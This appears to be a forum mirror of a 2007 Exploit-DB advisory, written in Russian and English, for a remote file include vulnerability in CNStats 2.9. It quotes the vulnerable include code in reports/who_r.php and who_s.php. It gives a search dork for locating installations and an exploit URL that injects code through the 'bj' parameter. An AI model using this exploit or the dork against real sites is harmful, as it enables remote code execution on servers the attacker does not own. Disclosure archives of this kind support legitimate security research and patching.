- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3741
- Проверка EDB
-
- Пройдено
- Автор
- IRVIAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2087 cve-2007-2086
- Дата публикации
- 2007-04-15
Код:
CNStats 2.9 (who_r.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# Scripts : CNStats 2.9
# Discovered By : irvian
# scripts site : http://www.cnstats.com/
# dork : "CNStats 2.9"
------------------------------------------------------------------------------------------
bug found:
/reports/who_r.php
/reports/who_s.php
$bk = 't';
include $bj . 'reports/who.php';
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]
# milw0rm.com [2007-04-15]- Источник
- www.exploit-db.com
